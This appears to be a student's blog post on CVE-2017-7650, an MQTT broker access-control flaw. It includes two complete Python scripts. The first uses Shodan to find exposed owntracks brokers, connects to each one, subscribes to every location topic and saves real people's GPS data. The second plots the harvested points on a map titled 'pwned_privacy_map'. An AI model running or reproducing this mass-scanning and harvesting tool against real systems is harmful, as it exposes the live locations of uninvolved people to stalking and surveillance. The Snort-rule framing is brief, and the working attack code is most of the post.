Previously I was working on a university minor project (an IPS system for IoT devices), so I picked CVE-2017-7650 to define a Snort rule for it. I was thinking about how someone could leverage this silly vulnerability, and I asked myself what kind of data in the current IoT space can compromise a user’s privacy. Yes, it is GPS data. I am a big fan of Python programming and wanted to use its power, so I wrote two small Python scripts. The first gathers a list of IP addresses from the Shodan API and tries to connect to those IPs as an MQTT client. If the connection is established successfully (this happens because no ACL is present on those IPs), the script tries to subscribe to all owntracks topics with the help of CVE-2017-7650 and stores the GPS data in a .json file, which is later used by the second script to map out those GPS points.
import paho.mqtt.client as mqtt import shodan import time import os, sys, socket #Some house cleaning if sys.platform != "win32": os.system('clear') else: os.system('cls') #Shodan API config SHODAN_API_KEY = "" #Sign up for new account at https://www.shodan.io and Put your shodan API key here(if you are university student please register with your university mail id to get fully featured account for free) shodan_api = shodan.Shodan(SHODAN_API_KEY) results = shodan_api.search("owntracks port:1883") def on_connect(client, userdata, flags, rc): print("[+] Connection successful") client.subscribe('owntracks/#', qos = 1) # Subscribe to all topics def on_message(client, userdata, msg): if msg.payload != "": print ('[+] Topic: %s \n[+] Message: %s \n' % (msg.topic, msg.payload)) f = open('CVE-2017-7650_owntracks_geodata.json', 'a+') f.write("%s\n" % (msg.payload)) f.close() else: print('Device is not vulnerable') client = mqtt.Client(client_id = "MqttClient") client.on_connect = on_connect client.on_message = on_message for result in results['matches']: ip_addr = result['ip_str'] f = open('CVE-2017-7650_owntracks_geodata.json', 'a') print('[+] Data recieved from: ' + ip_addr + '\n\n\n') f.close() try: client.connect(ip_addr, 1883, 60) except socket.error, e: print('[+] Error could not connect to ' + ip_addr) continue client.loop_start() time.sleep(6) client.loop_stop() client.disconnect() # Author: CJHackerz
import folium
import json
from time import sleep  # NOTE(review): imported but never used in this script

# Plot the collected GPS points on a world map.
# Reads the newline-delimited JSON file written by the collector script and
# writes a standalone HTML map; every line is treated as one JSON object.
geo_map = folium.Map(location=[0, 0], zoom_start=3 )
with open('CVE-2017-7650_owntracks_geodata.json', 'r') as json_file:
    #Iterating through json objects in each new line
    for data in json_file:
        # NOTE(review): each line is a payload received from a remote broker and
        # therefore untrusted input. json.loads sits outside the try block below,
        # so a line that is not valid JSON (e.g. an encrypted payload, which the
        # comment below says should be skipped) raises ValueError /
        # json.JSONDecodeError and aborts the whole run instead of being skipped.
        geo_data = json.loads(data)
        #To avoid encrypted data and json objects which does not have lat and lon attributes
        try:
            # Only KeyError is handled: a 'lat'/'lon' value of the wrong type
            # (e.g. a string) is passed straight through to folium.
            folium.Marker([geo_data['lat'], geo_data['lon']]).add_to(geo_map)
        except KeyError:
            continue
# Written to the current working directory; path is not configurable.
geo_map.save('pwned_privacy_map.html')